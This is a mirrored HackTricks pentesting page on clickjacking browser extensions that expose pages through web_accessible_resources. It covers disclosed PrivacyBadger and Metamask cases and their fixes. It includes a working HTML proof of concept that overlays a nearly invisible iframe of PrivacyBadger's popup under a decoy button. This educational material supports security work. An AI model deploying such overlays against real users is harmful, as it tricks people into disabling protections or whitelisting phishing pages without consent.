mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
115 lines
6.9 KiB
Markdown
115 lines
6.9 KiB
Markdown
|
# BrowExt - ClickJacking
|
||
|
|
|
||
|
|
<details>
|
||
|
|
|
||
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
|
||
|
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
|
||
|
|
</details>
|
||
|
|
|
||
|
|
## Basic Information
|
||
|
|
|
||
|
|
This page is going to abuse a ClickJacking vulnerability in a Browser extension.\
|
||
|
|
If you don't know what ClickJacking is check:
|
||
|
|
|
||
|
|
{% content-ref url="../clickjacking.md" %}
|
||
|
|
[clickjacking.md](../clickjacking.md)
|
||
|
|
{% endcontent-ref %}
|
||
|
|
|
||
|
|
Extensions contains the file **`manifest.json`** and that JSON file has a field `web_accessible_resources`. Here's what [the Chrome docs](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources) say about it:
|
||
|
|
|
||
|
|
> These resources would then be available in a webpage via the URL **`chrome-extension://[PACKAGE ID]/[PATH]`**, which can be generated with the **`extension.getURL method`**. Allowlisted resources are served with appropriate CORS headers, so they're available via mechanisms like XHR.[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)
|
||
|
|
|
||
|
|
In addition to being web accessible, the resources in the **`web_accessible_resources`** run with the ambient authority of the extension: they can alter state, load other resources, and modify the browser in certain ways. If a document in `web_accessible_resources` can perform any interesting behavior, an attacker can embed it in a webpage and trick visitors into triggering it.
|
||
|
|
|
||
|
|
## PrivacyBadger Example
|
||
|
|
|
||
|
|
It was discovered that the extension PrivacyBadger, the contents of the directory `skin/` were `web_accessible_resources`:
|
||
|
|
|
||
|
|
```json
|
||
|
|
"web_accessible_resources": [
|
||
|
|
"skin/*",
|
||
|
|
"icons/*"
|
||
|
|
]
|
||
|
|
```
|
||
|
|
|
||
|
|
So, by loading `skin/popup.html`, the document that gets rendered when you click the the PrivacyBadger icon in the browser, i**n an iframe we could fool the user into clicking "Disable PrivacyBadger for this Website"**, opening up the user to additional tracking and undermining the function of PrivacyBadger. **Check the ClickJacking video example in** [**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm)
|
||
|
|
|
||
|
|
The fix was easy: **remove `/skin/*` from the `web_accessible_resources`**.
|
||
|
|
|
||
|
|
### PoC
|
||
|
|
|
||
|
|
```html
|
||
|
|
<style>
|
||
|
|
iframe {
|
||
|
|
width: 430px;
|
||
|
|
height: 300px;
|
||
|
|
opacity: 0.01;
|
||
|
|
float: top;
|
||
|
|
position: absolute;
|
||
|
|
}
|
||
|
|
|
||
|
|
#stuff {
|
||
|
|
float: top;
|
||
|
|
position: absolute;
|
||
|
|
}
|
||
|
|
|
||
|
|
button {
|
||
|
|
float: top;
|
||
|
|
position: absolute;
|
||
|
|
top: 168px;
|
||
|
|
left: 100px;
|
||
|
|
}
|
||
|
|
|
||
|
|
</style>
|
||
|
|
|
||
|
|
<div id="stuff">
|
||
|
|
<h1>
|
||
|
|
Click the button
|
||
|
|
</h1>
|
||
|
|
<button id="button">
|
||
|
|
click me
|
||
|
|
</button>
|
||
|
|
</div>
|
||
|
|
|
||
|
|
<iframe src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
|
||
|
|
</iframe>
|
||
|
|
```
|
||
|
|
|
||
|
|
## Metamask Example
|
||
|
|
|
||
|
|
A [**blog post about a ClickJacking in metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was **`https:`** or **`http:`** (not **`chrome:`** for example):
|
||
|
|
|
||
|
|
<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
|
||
|
|
**Another ClickJacking fixed** in the Metamask extension was that users were able to **Click to whitelist** when a page was suspicious of being phishing because of `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. As that page was vulnerable to Clickjacking, an attacker could abuse it showing something normal to make the victim click to whitelist it without noticing, and then going back to the phishing page which will be whitelisted.
|
||
|
|
|
||
|
|
## Steam Inventory Helper Example
|
||
|
|
|
||
|
|
Check the following page to check how a **XSS** in a browser extension was chained with a **ClickJacking** vulnerability:
|
||
|
|
|
||
|
|
{% content-ref url="browext-xss-example.md" %}
|
||
|
|
[browext-xss-example.md](browext-xss-example.md)
|
||
|
|
{% endcontent-ref %}
|
||
|
|
|
||
|
|
## References
|
||
|
|
|
||
|
|
* [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html)
|
||
|
|
|
||
|
|
<details>
|
||
|
|
|
||
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
|
||
|
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
|
||
|
|
</details>
|